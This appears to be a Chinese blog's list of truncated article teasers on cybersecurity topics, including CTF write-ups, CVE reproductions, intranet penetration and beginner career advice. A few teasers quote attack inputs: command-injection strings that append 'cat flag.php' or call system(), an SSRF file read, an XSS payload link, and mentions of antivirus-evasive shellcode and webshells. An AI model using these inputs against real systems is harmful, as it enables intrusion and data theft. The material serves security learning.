文章目录万户协同办公平台 ezoffice存在未授权访问漏洞附POC1. 万户协同办公平台 ezoffice简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾万户协同办公平台 ezoffice存在未授权访问漏洞附POC 免责声明：请勿利用文章内的相…

beebox靶场A1 low 命令注入通关教程（上）

一：html注入 get HTML注入，就是当用户进行输入时，服务器没有对用户输入的数据进行过滤或转义，导致所有输入均被返回前端，网页解析器会将这些数据当作html代码进行解析,这就导致一些恶意代码会被正常执行。首先进行简…

黑客技术（网络安全）学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

CSO面对面丨中核华辉刘博：应对大型央国企数字化转型道路上必须攻克的安全难题

“极致”，一直是大型央国企网络安全工作建设追求的目标。随着我国数字化转型全面走深向实，网络安全风险、数据管理、层出不穷的网络攻击，为各领域大型央国企数字化转型带来了更多的挑战。如何充分发挥优势、携手各方构筑网络安全屏障、提升安…

黑客网站大全！都在这了！速看被删就没了

我们学习网络安全，很多学习路线都有提到多逛论坛，阅读他人的技术分析帖，学习其挖洞思路和技巧。但是往往对于初学者来说，不知道去哪里寻找技术分析帖，也不知道网络安全有哪些相关论坛或网站，所以在这里给大…

计算机发展史-计算机基础知识总结（上）

随着计算机技术的不断发展，计算机已经成为人们日常生活中必不可少的一部分，而且它也对人类社会产生了巨大的影响。本文将从计算机的发展历史、计算机硬件和软件、操作系统、计算机网络、数据库等方面进行系统的介绍，为读者提供计算机基础知识…

正则表达式提取http和http内容

http.* 这样匹配到的就是我们要的内容取反正则：^((?!要取反的正则表达式).)*$ 取反：^((?!http.).)$ 这样匹配到的就是我们不要的内容提取域名 /[(http|ftp|https):\/\/]?([\w_-](?:(?:\.[\w_-])))([\w.,?^%&:\/~#-]*[\w?^%&\/~#-]…

网络安全之认识日志采集分析审计系统

日志对于大家来说非常熟悉，机房中的各种系统、防火墙、交换机、路由器等等，都在不断地产生日志。无数实践告诉我们，健全的日志记录和分析系统是系统正常运营与优化以及安全事故响应的基础。我们一起来认识日志采集分析审计系统。一、什么是…

CVE漏洞复现-CVE-2020-16846SaltStack命令注入

CVE-2020-16846SaltStack命令注入 CVE-2020-16846 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846，CVE-2020-16846允许用户执行任意命令。组合这两个漏洞，将可以使未授权的攻击者通 …

查看公司电脑里软件安装

查看公司电脑里软件安装是一项重要的任务，可以帮助管理员了解员工在工作中使用的软件情况，以及发现潜在的安全风险。方法一：事件查看器点击开始菜单，搜索“事件查看器” 2、点击“windows”日志，打开“应用程序”&a…

upload-labs靶场1-18关解法总结

目录 PASS-1 PASS-2 PASS-3 PASS-4 PASS-5 PASS-6 PASS-7 PASS-8 PASS-9 PASS-10 PASS-11 PASS-12 PASS-13 PASS-14 PASS-15 PASS-16 PASS-17 PASS-18 PASS-1 我们试着上传一个php文件，文件内容为 <?phpphpinfo(); ?> 弹窗显示不允许上传，说…

密码设备应用接口规范GMT0018-2012

GMT0018标准规定的是公钥密码基础设施应用技术体系下服务类密码设备的应用接口标准。 （1）设备管理类函数（接口操作成功返回0，不成功返回非0错误代码） SDF_OpenDevice\SDF_CloseDevice 打开/关闭设备 SDF_OpenSe…

一次cs上线服务器的练习

环境：利用vm搭建的环境仅主机为65段测试是否能与win10ping通配置转发配置好iis Kali访问测试现在就用burp抓取winser的包开启代理使用默认的8080抓取成功上线

短视频平台Roposo入驻印尼，会成为下一个Tiktok吗

Roposo是一个印度本土的短视频平台，功能和风格都和Tiktok很相似。早在2020年7月，印度下令封禁了多个app，其中就包括了TikTok。在那之前，TikTok已经在印度累计了约2亿的用户，基数已经非常的大，那么被封禁之…

利用mininet模拟SDN架构并进行DDoS攻击与防御模拟（Ryu+mininet+sflow+postman）

1、知识概述 （1）软件定义网络： （2）mininet： Mininet是一个强大的网络仿真平台，通过这个平台，我们可以很方便的模拟真实环境中的网络操作与架构。特别是SDN，在真实网络中…

关于企业如何防控网络流量攻击的讨论

网络流量攻击是指攻击者利用网络上的各种漏洞和技术手段，向目标企业的网络发起大量请求，从而造成网络带宽拥堵、系统瘫痪甚至数据泄露等危害。这种攻击方式主要针对那些依赖网络运营的企业，如电商平台、金融机构、云服务提供商等，…

【审计思路】如何快速定位SQLMS注入漏洞？

0x00 前言 MCMS是政府、教育等其他行业常用的CMS，应用广泛，但是底层的代码中仍然遗留不少的问题。这篇文章主要针对SQL注入进行审计并探讨如何快速定位SQL注入漏洞，以及其他工具的应用。 MCMS，是完整开源的Java CMS！基…

内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

中睿天下获评2022年度中关村网信联盟工业互联网标准工作特别贡献奖

近日，中关村网络安全与信息化产业联盟（简称“CCAIA”）于线上召开联盟第二届第五次会员大会，来自全国的联盟成员代表、行业专家等100余人出席会议，共同听取了联盟2022年工作总结与2023年工作计划，大会设置了…

如何学习网络安全？

近半年我一直在整理网络安全相关资料，对于网络安全该怎么入门我谈谈我的看法，网络安全一直处于法律的边缘，学的不好或者剑走偏锋一下子人就进去了，所以我建议入门前先熟读《网络安全法》，除此之外还有《互联网安全产品…

pyLoad远程代码执行漏洞复现(CVE-2023-0297)

1、产品简介 pyLoad是一个用 Python 编写的免费和开源下载管理器，可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。 2、漏洞概述 pyLoad 存在代码注入漏洞，未经身份验证的攻击者可以通过滥用 js2py 功能…

《网络安全入门到精通》 - 2.1 - Windows基础 - DOS命令Windows防火墙Windows共享文件

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「订阅专栏」：此文章已录入专栏《网络安全入门到精通》 Windows基础一、DOS命令1、目录文件操作dir 列出目录文件cd 切换目录md 创建目录rd 删除目录move 移动文件或目…

ATTCK v12版本战术介绍——防御规避（二）

一、引言在前几期文章中我们介绍了ATT&CK中侦察、资源开发、初始访问、执行、持久化、提权战术、防御规避（一）理论知识及实战研究，本期我们为大家介绍ATT&CK 14项战术中防御规避战术（二），包括防御…

PhpStudy下载安装使用教程，图文教程（超详细）

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 PhpStudy一、官网下载二、安装三、简单使用四、粉丝福利PhpStudy：让天下没有难…

Spring Messaging-远程命令执行漏洞（CVE-2018-1270）

Spring Messaging-远程命令执行漏洞（CVE-2018-1270） 0x00 前言 spring messaging为spring框架提供消息支持，其上层协议是STOMP，底层通信基于SockJS，在spring messaging中，其允许客户端订阅消息&#xff0…

HACKTHEBOX——Help

nmap可以看到对外开放了22,80,3000端口可以看到80端口和3000端口都运行着http服务，先从web着手切入TCP/80访问web提示无法连接help.htb，在/etc/hosts中写入IP与域名的映射打开只是一个apache default页面，没什么好看的使用gobuster扫描网站目…

Java应用服务系统安全性，签名和验签浅析

1 前言随着互联网的普及，分布式服务部署越来越流行，服务之间通信的安全性也是越来越值得关注。这里，笔者把应用与服务之间通信时，进行的的安全性相关，加签与验签，进行了一个简单的记录。 2 安全性痛点 …

[免费专栏] 汽车威胁狩猎之常用的几种威胁狩猎工具

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历汽车威胁狩猎专栏长期更新，本篇最新内容请前往： …

上网的概念，我们在上网时，我们在做什么，目前世界的网络结构，互联网的基本结构

互联网的物理连接方式可以简单地表示为： 海底光缆-陆地光缆-网络运营商-用户家庭/服务器-光猫-路由器-终端设备海底光缆连接到每个国家的陆地上的一个或者多个登陆点，从而变成陆地光缆，陆地光缆都互相连接到每个城市的中转节点，…

VM中kali虚拟机创建docker部署WebGoat

这里选择在docker中配置（因为方便） 首先下载docker sudo apt-get install docker.io 然后从Docker Hub下载WebGoat 8.0 的docker镜像使用命令 docker pull webgoat/webgoat-8.0 完成后查看现在kali虚拟机中的docker镜像列表输入命令 docker images …

应用服务漏洞扫描与利用

任务环境说明：服务器场景：Server15服务器场景操作系统：未知（关闭链接）使用命令nmap探测目标靶机的服务版本信息，将需要使用的参数作为FLAG进行提交；FLAG:sV 通过上述端口访问靶机系统并探测隐藏的页面，将找到的敏感文件、目录名作为FLAG（形式：[敏感文件或目录1,敏感…

为什么说网络安全是风口行业？是IT行业最后的红利？

前言 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点 1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万&…

小白怎么系统的自学计算机科学和黑客技术？

我把csdn上有关自学网络安全、零基础入门网络安全的回答大致都浏览了一遍，最大的感受就是“太复杂”，新手看了之后只会更迷茫，还是不知道如何去做，所以站在新手的角度去写回答，应该把回答写的简单易懂，“傻…

bugku 渗透靶场3

前言本题一共八个flag，主要是为了练习内网渗透的思路。解题思路首先给了一个站长之家-模拟蜘蛛爬取，这个以前见到过，存在sstf漏洞，直接读取文件。 file:///flag既然是要内网渗透，那肯定要看/etc/hosts。 file:…

XSS脚本攻击是怎么回事,了解一下

跨站脚本攻击（Cross-Site Scripting，XSS）是一种常见的网络安全攻击手段，攻击者通过注入恶意脚本代码（通常是 JavaScript 代码）到受害者浏览的网页中，以达到窃取用户数据、篡改网页内容等目的。 …

CSO面对面丨对话海通证券，探讨数字金融行业安全运营

新技术的涌现带动了金融行业的数字化转型发展，同时也带来了更多安全挑战。一方面，金融科技大量采用新技术实现业务创新的同时，也给网络安全带来了更多隐性风险。另一方面，金融行业数字化转型的进一步普及，大量个人隐私…

软考网络工程师要怎么复习？

一、明确考试重点和难点网络工程师考试主要考察网络基础知识、网络架构设计、网络安全、网络管理等方面的知识。因此，我们在复习的时候，一定要明确考试重点和难点，将重点知识点逐一梳理，逐一掌握。二、查漏补缺在进行复习的…

对称加密/非对称加密

古典密码学起源于古代战争:在战争中，为了防止书信被截获后重要信息泄露，人们开始对书信进行加密。移位式加密如密码棒，使用布条缠绕在木棒上的方式来对书信进行加密。加密算法：缠绕后书写密钥： 木棒的尺寸替…

自学黑客！一般人我劝你还是算了吧！

笔者本人 17 年就读于一所普通的本科学校，20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂，现就职于某大厂安全联合实验室。我为啥说自学黑客，一般人我还是劝你算了吧！因为我就是那个不一般的人。首先我谈下对黑客&am…

使用Cheat Engine与DnSpy破解Unity游戏

题目连接： https://play.picoctf.org/practice/challenge/361?originalEvent72&page3我们是windows系统，所以点击windows game下载游戏双击运行pico.exe 屏幕上方的一串英文是叫我们找flag，我在这个小地图里走来走去也没flag&#xff…

网络安全必学 SQL 注入

1.1 .Sql 注入攻击原理 SQL 注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一，它也是目前被利用得最多的漏洞。要学会如何防御 SQL 注入，首先我们要学习它的原理。针对 SQL 注入的攻击行为可描述为通过在用户可控参数中注入 SQL 语法&#…

Web 攻防之业务安全：验证码绕过测试.（修改数据包中 res_code 的值实现绕过.）

Web 攻防之业务安全：验证码绕过测试. 业务安全是指保护业务系统免受安全威胁的措施或手段。广义的业务安全应包括业务运行的软硬件平台（操作系统、数据库，中间件等）、业务系统自身（软件或设备）、业务所提供…

DC:5靶机通关详解

信息收集漏洞发现扫个目录发现存在footer.php 查看,发现好像没什么用参考他人wp得知thankyou.php会包含footer.php 可以通过传参来包含别的文件但是我们不知道参数,这里用fuzz来跑参数这里用wfuzz的时候报错了解决方法如下卸载 sudo apt --purge remove python3-pycu…

CVE-2023-21839 Weblogic远程代码执行漏洞复现

目录 0x01 声明： 0x02 简介： 0x03 漏洞概述： 0x04 影响版本： 0x05 环境搭建： Docker环境搭建： 漏洞环境搭建： 1、编辑docker-compose.yml 2、启动docker 3、访问页面： 0x…

网络安全SSRF漏洞检测

SSRF 检测的一些思考 DNS 平台没有立刻收到请求，是在之后的某个时间段收到了不同的请求信息，这至少表明了一点，此处存在有无回显的 SSRF，虽然想要证明有更大的危害比较困难，但是至少说明了存在有 SSRF 的风险&#xf…

$网络安全复习$

网络安全复习

目录低层协议安全性 IP协议 ARP协议 TCP协议 NAT协议单钥加密体制 DES算法课后习题双钥加密体制 🐇怎么说欧几里得算法求逆 RSA算法椭圆曲线加密 Diffie- Hellman 密钥交换算法 ElGamal签名机制 Schnorr签名机制 DSS签名算法——DSA 低层协…

2023最新100道渗透测试面试题（附答案）

眨眼间2023年快过去一半了，不知道大家有没有找到心仪的工作呀，今天我给大家整理了100道渗透测试面试题给大家，需要答案的话可以在评论区给我留言哦~ 第一套渗透面试题什么是渗透测试？它的目的是什么？ 渗透测试的五个…

法发〔2016〕22号《关于办理刑事案件收集提取和审查判断电子数据若干问题的规定》

文号：法发〔2016〕22号全部标题：最高人民法院最高人民检察院公安部印发《关于办理刑事案件收集提取和审查判断电子数据若干问题的规定》的通知发文时间：2016年9月9日来源：最高人民法院网原文链接：权威发布 - 中…

【高危】MySQL Server拒绝服务漏洞（CVE-2023-21912）

漏洞描述 MySQL是Oracle开源的关系型数据库管理系统。 MySQL Server 受影响版本存在拒绝服务漏洞，攻击者者无需身份验证可发送连接数据包导致MySQL Server 崩溃拒绝服务。官方未公布相关细节，可能由于对客户端设置字符集的处理不当，当客户端…

[CTF/网络安全] 攻防世界 view_source 解题详析

[CTF/网络安全] 攻防世界 view_source 解题详析查看页面源代码方式归类总结题目描述：X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。查看页面源代码方式归类单击鼠标右键，点击查看页面源代码： …

内网渗透(六十一)之Kerberosating攻击

Kerberosating攻击 Kerberosating攻击发生在Kerberos协议的TGS_REP阶段，KDC的TGS服务返回一个由服务Hash 加密的ST给客户端。由于该ST是用服务Hash进行加密的，因此客户端在拿到该ST后可以用于本地离线爆破。如果攻击者的密码字典足够强大，则很有可能爆破出SPN链接用户的明文…

Nessus漏洞扫描以及OpenSSH漏洞修复验证

主机IP地址资源kali192.168.200.1285GB内存/4CPUCentOS7.5192.168.200.1292GB内存/2CPU https://www.tenable.com/downloads/nessus?loginAttemptedtrue curl --request GET \--url https://www.tenable.com/downloads/api/v2/pages/nessus/files/Nessus-10.5.1-ubuntu1404_am…

保护移动设备免受恶意软件侵害优秀方法

几天前，移动恶意软件攻击增加了500%显然，我们大多数人都不知道不能很好地保护我们的手机下面小编揭秘有效保护移动设备免受恶意软件侵害的最佳方法。 1、使用移动反恶意软件恶意软件很容易感染智能手机和平板电脑，因此在设备上安装可靠的…

数通运营商方向常见面试问题（第五部分）

VXLAN以主要应用在哪里? 和传统的二层网络相比，有什么优势7 数据中心。首先描述传统二层VPN的缺点：传统二层要用STP,收敛慢、链路利用率低不合适。传统VPLS为解决环路会采用STP技术，CE到PE采用主备模式，无法形成多路径&#…

内网渗透(七十五)之域权限维持之DCShadow

DCShadow 2018年1月24日，在BlueHat安全会议上，安全研究员Benjamin Delpy 和 Vincent Le Toux 公布了针对微软活动目录域的一种新型攻击技术------DCShaow。利用该攻击技术，具有域管理员权限或企业管理员权限的恶意攻击者可以创建恶意域控，然后利用域控间正常同步数据的功能…

漏洞挖掘小技巧（一）

Swagger UI反射XSS Swagger UI是目前最流行的RestFul接口API文档和测试工具。首先写一个 json的 XSS 负载 https://gist.githubusercontent.com/ramkrivas/c47c4a49bea5f3ff99a9e6229298a6ba/raw/e2e610ea302541a37604c7df8bcaebdcb109b3ba/xsstest.json回到Swagger UI&…

CentOS7隐藏版本号防止被扫出openssh漏洞

1、查看当前SSH版本号 strings /usr/sbin/sshd |grep OpenSSH2、将版本号改为hello world sed -i s/OpenSSH_9.0/hello world/g /usr/sbin/sshd3、连接SSH查看版本号

HackTheBox - Medium - Linux - OnlyForYou

OnlyForYou OnlyForYou 是一台中等难度的 Linux 计算机，其特点是 Web 应用程序容易受到本地文件包含 （LFI） 的影响，该应用程序用于访问源代码，从而揭示盲目命令注入漏洞，从而导致目标系统上的 shell。该计…

网络工程师知识点5

71、什么是FTP？ FTP是文件传输协议。 FTP传输数据时支持两种传输模式：ASCII模式和二进制模式。需要TCP的21号端口来建立控制连接需要TCP的20号端口来建立数据连接 72、什么是telnet？ Telnet提供了一个交互式操作界面，允许终端远…

多层内网渗透

文章目录域渗透域渗透红日一靶场网络拓扑图实验环境 win7:web服务器公网IP：192.168.1.139内网IP：192.168.52.143 Win2008:域控内网IP：192.168.52. Win2003:域成员内网IP：192.168.52.扫描端口发现web服务，访问服…

常用的安全渗透测试工具！（含安装、使用教程）

SQLMap 1.SQLMap详解 SQLMap是一个自动化的SQL注入工具，其主要功能是扫描、发现并利用给定URL的SQL注入漏洞，内置了很多绕过插件，支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Fir…

Python灰帽编程——错误异常处理与面向对象

文章目录错误异常处理与面向对象1. 错误和异常1.1 基本概念1.1.1 Python 异常 1.2 检测（捕获）异常1.2.1 try except 语句1.2.2 捕获多种异常1.2.3 捕获所有异常 1.3 处理异常1.4 特殊场景1.4.1 with 语句 1.5 脚本完善 2. 内网主机存活检测程序2.1 scap…

谈谈信息安全入门这事 New Address

本周一在发布"计算机与网络安全系列书单推荐"时，hblf的朋友圈给了我一定触动，"信息安全如何入门"这个问题让我想到了一些有趣的东西，所以抽空写一写自己的答案。 "信息安全如何入门"这个问题我觉得需要拆成3个…

Web 攻防之业务安全：输入 / 输出模块测试.

Web 攻防之业务安全：输入 / 输出模块测试. 业务安全是指保护业务系统免受安全威胁的措施或手段。广义的业务安全应包括业务运行的软硬件平台（操作系统、数据库，中间件等）、业务系统自身（软件或设备）、业务所…

软考网络工程师每日一练10.17

一款功能强大的web目录扫描器专业版

dirpro 简介 dirpro 是一款由 python 编写的目录扫描器，操作简单，功能强大，高度自动化。自动根据返回状态码和返回长度，对扫描结果进行二次整理和判断，准确性非常高。已实现功能可自定义扫描线程导入url文件进…

2020 年网络安全应急响应分析报告

2020 年全年奇安信集团安服团队共参与和处置了全国范围内 660起网络安全应急响应事件。2020 年全年应急响应处置事件行业 TOP3 分别为:政府部门行业(146 起)医疗卫生行业(90 起)以及事业单位(61 起，事件处置数分别占应急处置所有行业的 22.1%、13.6%、9.2%。2020 年…

BUUCTF 隐藏的钥匙 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 路飞一行人千辛万苦来到了伟大航道的终点，找到了传说中的One piece，但是需要钥匙才能打开One Piece大门，钥匙就隐藏在下面的图片中，聪明的你能帮路飞拿到钥匙&#xff…

脏数据绕过waf，Yakit爆破base64编码密码，ssh无密码登录受害主机

文章目录 waf、Yakit、ssh 技巧waf 脏数据绕过Yakit 工具对明文密码通过base64编码的格式进行爆破 SSH实操 waf、Yakit、ssh 技巧 waf 脏数据绕过以pikachu靶场的文件上传功能为例上传一个木马图片显示已拦截。找到form-data;字段加一个分号，中间写一些脏数…

高防CDN：云服务不可或缺的安全屏障

在当今数字化时代，网络攻击日益猖獗，云服务的安全性愈发受到重视。高防CDN（内容分发网络）作为一项关键技术，已经逐步成为云服务不可或缺的一部分。本文将详细探讨高防CDN是如何一步步崭露头角，并在云服务中…

网络安全岗位面试题大全：解析各个分支岗位的面试题目，帮助你上岸大厂

网络安全是一个广泛的领域，涵盖了许多不同的岗位和分支。我整理了网络安全各个岗位分支的面试题目： 安全工程师/系统管理员您如何确保网络系统的安全性和保密性？您采用了哪些技术和工具？请描述一下您在过去工作中遇到的最具挑战…

bugku-eval

这是一道php题，标题是eval，先查一下eval的用法 Eval,var_dump,echo的区别 var_dump()会将传入的变量打印到页面（变量类型,变量长度和变量值） eval()会执行传入到其中的php代码 echo输出的是最终的结果（变量类型和字…

权限提升：溢出漏洞.（普通权限提升管理员权限.）

权限提升：溢出漏洞权限提升简称提权，由于操作系统都是多用户操作系统，用户之间都有权限控制，比如通过 Web 漏洞拿到的是 Web 进程的权限，往往 Web 服务都是以一个权限很低的账号启动的，因此通过 Webshell …

bugku-webshell

知识点： url地址： URL地址也就是Internet上用来描述信息资源的字符串，主要用在各种WWW客户程序和服务器程序上。采用URL可以用一种统一的格式来描述各种信息资源，包括文件、服务器的地址和目录等。 URL的格式由下列三部分组成&…

buuctf-shell

打开网址，网址和源代码都是空的有一个一眼就可以注意到的东西，要我们传入一个s的值，但是要传入什么？ 那么可以直接构造，首先想到system函数，没禁用 ?ssystem(“ls”)查看当前路径一开始看到文件名&…

报名通道开启 | 第六届“强网”拟态防御国际精英挑战赛强势来袭

第六届“强网”拟态防御国际精英挑战赛计划将于2023年11月下旬在南京震撼开幕。本届比赛采用线上线下结合的形式，再次为全球顶尖战队提供实战机会，向多类拟态防御设备系统发起挑战。接受挑战的拟态防御设备系统基于邬江兴院士原创的网络空间内生安全理…

第五届浙江省网络安全竞赛预赛部分wp

0ak战队 - 名称：0ak - 排名： 二、解题情况: 附件里三、解题过程 WEB 1.easyweb robots.txt http://1.14.97.218:24948/robots.txt 出来 User-agent: Spider Disallow: /a? Disallow: /s? Disallow: /ulink? Disallow: /link? Disallow…

《互联网安全产品漏洞管理规定》

《网络产品安全漏洞管理规定》由工业和信息化部、国家互联网信息办公室、公安部联合印发，自2021年9月1日起施行。该《规定》明确，任何组织或者个人不得利用网络产品安全漏洞从事危害网络安全的活动，不得非法收集、出售、发布网络产品安全漏洞…

新手如何学习挖漏洞？【网络安全】

新手如何学习挖漏洞？看这篇就够了前言有不少阅读过我文章的伙伴都知道，我从事网络安全行业已经好几年，积累了丰富的经验和技能。在这段时间里，我参与了多个实际项目的规划和实施，成功防范了各种网络攻击和漏洞利用&…

网络安全：渗透神器 kali 的安装.

网络安全：渗透神器 kali 的安装. Kali Linux是一款基于Debian的Linux发行版，专门用于渗透测试和网络安全评估。它包含了大量的渗透测试工具和网络安全工具，适用于各种不同的渗透测试场景和需求。目录： 网络安全：渗透…

内网渗透(六十八)之域权限维持之 Skeleton Key

域权限维持之 Skeleton Key 戴尔的安全研究人员在一次威胁涉猎中发现了一种可以在活动目录上绕过的单因素身份验证的方法，该方法使得攻击者在获得域管理员权限或企业管理员权限的情况下，可以在目标域控的LSASS内存中注入特定的密码，然后就可以使用设置的密码来以任何用户身…

细说websocket -Node篇

一、WebSocket 协议 1. 概述 websocket协议允许不受信用的客户端代码在可控的网络环境中控制远程主机。该协议包含一个握手和一个基本消息分帧、分层通过TCP。简单点说，通过握手应答之后，建立安全的信息管道，这种方式明显优于前文所说的基于…

小白怎么入门网络安全？看这篇就够啦！

由于我之前写了不少网络安全技术相关的故事文章，不少读者朋友知道我是从事网络安全相关的工作，于是经常有人在微信里问我： 我刚入门网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选&#xff…

Vulnhub项目：Aragog

1、靶机地址： HarryPotter: Aragog (1.0.2) ~ VulnHub 死亡圣器三部曲之第一部，Aragog是海格养的蜘蛛的名字， 并且又牵扯到了密室 2、渗透过程确定靶机ip，攻击机ip，扫描靶机开放端口只有22，80端口&a…

自学黑客（网络安全），看完这篇，再去追你的黑客梦！

今天专题是替一些想入门网络安全，但还迷茫不知所措的同学解一解惑。想30天零基础入门网络安全，这些你一定要搞清楚。一、学习网络安全容易造成的误区 1、把编程当作目的，忽略了它的工具职能千万不要抱着“以编程为目的，再开始…

腾讯云EdgeOne为什么能让客户降本增效？

随着数字化时代的来临，各类线上互动场景不断出现，并成为人们日常工作生活中的一部分。然而，基于互联网提供线上娱乐、线上办公、线上购物等服务的企业，在复杂的全球网络环境下会遇到网络延迟不稳定的情况，海外环境更多…

【DHCP】DHCP部署与安全

文章目录部署DHCP与安全一、DHCP作用二、DHCP相关概念三、DHCP优点四、DHCP原理1、发送DHCP Discovery广播包2、响应DHCP Offer广播包3、客户机发送DHCP Request广播包4、发送DHCP ACK广播包五、DHCP续约六、部署DHCP服务器1、IP地址固定（服务器必须固定IP地址&…

实现免杀:Shellcode的AES和XOR加密策略(vt查杀率:4/70)

前言什么是私钥和公钥私钥和公钥是密码学中用于实现加密、解密和数字签名等功能的关键组件。私钥是一种加密算法中的秘密密钥，只有密钥的拥有者可以访问和使用它。私钥通常用于数字签名和数据加密等场景中，它可以用于对数据进行加密，同…

HCIA笔记-----NAT网络地址转换

NAT ： 网络地址转换功能： 1.将大量的私有地址转换为公有地址（节约IP地址） 2.将一个IP地址转换为另一个IP地址（公有的）（增加内部网络设备的安全性） 缺陷： 1.极其消耗网络设…

HCIA笔记-----ACL访问控制列表

ACL 访问控制列表功能： 1.访问限制 ----在路由器流量进或出的接口上匹配流量，之后对其进行限制 2.定义感兴趣流量 ACL 简介: 1.自上而下，逐一匹配，上条匹配按上条执行，不在查看下条 2.ACL 列表的调用分为in&…

红队免杀，一句话木马的套路

一句话木马的套路 the-backdoor-factory 安装 Kali下方式一： git clone https://github.com/secretsquirrel/the-backdoor-factory 方式二： apt-get install backdoor-factory 使用说明 ./backdoor.py -h 检查待检测软件是否支持（如…

小白入门SRC漏洞挖掘的正确姿势

前言有不少阅读过我文章的伙伴都知道，我从事网络安全行业已经好几年，积累了丰富的经验和技能。在这段时间里，我参与了多个实际项目的规划和实施，成功防范了各种网络攻击和漏洞利用，提高了安全防护水平。也有很多小…

自学网络安全遇到问题怎么解决？路线是什么

自学网络安全很容易学着学着就迷茫了，找到源头问题，解决它就可以了，所以首先咱们聊聊，学习网络安全方向通常会有哪些问题，看到后面有惊喜哦 1、打基础时间太长学基础花费很长时间，光语言都有几门&#xf…

【网络安全篇】如何当着面试官的面优雅地装逼！

从胡子的长度和忧郁的眼神我察觉到，面前坐着的这位面试官应该有点东西。浑身上下流露着打过CTF的气场。我像以往一样，准备花3分钟的时间进行自我介绍。在此期间，面试官面无表情但很有耐心的听着我balabala。我按照原定计划顺利地介绍(吹…

【严重】vm2 ＜3.9.18 沙箱逃逸漏洞（存在POC）

漏洞描述 vm2 是一个基于 Node.js 的沙箱环境，可以使用列入白名单的 Node 内置模块运行不受信任的代码，代理对象用于拦截并重定义宿主对象的各种操作。 vm2 3.9.18之前版本中，由于 prepareStackTrace 函数直接由 V8 引擎调用，其…

Python count()函数详解

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 count 1、指定搜索位置2、参数为负数3、列表的coun…

CVE-2022-31325

文章目录 CVE-2022-30887一、漏洞介绍二、渗透步骤1、打开网站2、查找注入点3、截取数据包4、SQL注入（1）、探测数据库（2）、探测数据表（3）、探测列名（4）、查看flag值 CVE-2022-30887 …

BUUCTF Web题基本知识点和解题思路（1）

BUUCTF Web题基本知识点和解题思路（1） url里出现了类似于/?ip这样的参数，可以首先尝试命令注入，如?ip127.0.0.1, ?ip127.0.0.1;ls, ?ip127.0.0.1;cat flag.php，通过执行注入命令获取到flag的信息。注意&#xff1…

网络可视化 | 使用Omnia增强网络的可视性、安全性和监控性能

如今，企业的网络是一切运作的基础。它提供了将企业所有部门相互连接的重要途径，并提供了使组织能够与其服务的社区和个人进行沟通的渠道。它是维持每个企业所依赖的应用程序的机制，也是运输对企业至关重要的每一个数据的信息高速公路&#xf…

网络安全岗位缺口已达70万，你该不会还不知道如何入门吧？

我发现最近安全是真的火，火到不管男女老少都想入门学一下。但是，要是真的问起他们，“你觉得网络安全是什么？为什么想学？”，十个人里不见得有一个人能逻辑清晰、态度坚定地回答出来。作为一个时刻关注行业…

bugku-alert

打开网页后出现这样的界面，没什么有用的信息。查看源页面出现这样的界面，除了说明编写的语言是java也没什么重要信息。这是一段比较特别的代码在网上查看后发现一共有两种方式： 1.用burp智能解密 2.将其用html打开

【漏洞复现】CVE-2023-6848 kodbox远程命令执行

漏洞描述 kodbox 是一个网络文件管理器。它也是一个网页代码编辑器，允许您直接在网页浏览器中开发网站。您可以在基于 Linux、Windows 或 Mac 的平台上在线或本地运行 kodbox。唯一的要求是要有 PHP 5及以上。 kalcaddle kodbox 中发现漏洞，最高版本为 1.48。它已被宣布为关…

网络空间安全——MS15_034漏洞验证与安全加固

网络空间安全——MS15_034漏洞验证与安全加固靶机：windows 2008 安装好iis7.5 1.安装iis7.5,用127.0.0.1访问，将访问页面截图 2.用burpsuite 抓包分析是否存在ms15_034漏洞，抓包验证截图 3.调用msf相应的测试模块进行扫描，…

bugku-好像需要密码

因为要获取5位数密码，就要将密码限定在5位数通过点击 Payload type的界面，可以改变Payload Options的界面，然后将范围限定在10000-99999之间输入密码后，就得到flag

攻防世界-pdf

下载文件后，发现是个pdf文件，没有任何作用，先用word打开，将图片提取出来根据题目的提示猜测可能图的下面有所隐藏改变其长宽，但是仍然没有什么变化那么题目所说的下面，只可能是说明图片覆盖了某些信息&…

SQL注入-HTTP头注入

目录 HTTP Header概述 HTTP Header注入 HTTP Header注入概述 HTTP Header注入实例 HTTP Header概述 HTTP工作原理 HTTP请求方法 HTTP报文类型请求报文（HTTP Request）：由客户端发给服务器的消息，其组成包括请求行（R…

web：[HCTF 2018]admin

